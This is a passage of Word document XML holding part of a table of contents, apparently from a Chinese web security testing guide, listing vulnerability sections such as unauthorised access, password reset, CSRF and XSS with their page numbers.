                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>72</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3224A1A9"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40" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.14 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>权限缺失</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40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73</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="425A9C99" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434541" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.14.1 Flash</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>跨域访问</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1 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>73</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="29366902" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434542" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.14.2 jsonp</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>跨域请求</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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>76</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="276739E2" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434543" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.14.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>未授权访问</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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>77</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3E2469DE"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44" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.15 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>权限篡改</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4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0</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="15FE5087" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434545" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.15.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>任意用户密码修改</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>重置</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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>80</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="58640D94" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434546" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.15.2 SSO</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>认证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6 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>82</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1169CBFF" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00B038EB" w:rsidRDefault="000B549D" w:rsidP="00620876">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8295"/>
              </w:tabs>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434547" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">2.15.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                </w:rPr>
                <w:t>越权</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:tab/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:instrText xml:space="preserve"> PAGEREF _Toc498434547 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>83</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00B038EB">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="22C3B853" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434548" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.15.4 Cookies</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>伪造</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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>85</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="498314F4" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434549" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.15.5 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>会话变量可控</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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>86</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="44C7B573" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434550" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.15.6 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>跨站请求伪造（</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>CSRF</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>）</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0 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>86</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3C88CA54"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51" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.16 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>综合利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51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91</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="66C6D247" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434552" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.16.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>跨站脚本攻击（</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>XSS</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>）</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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>91</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="747DDEDB" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434553" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.2 FLASH</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>跨站脚本攻击</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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>105</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1BDB7B6F" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434554" w:history="1">
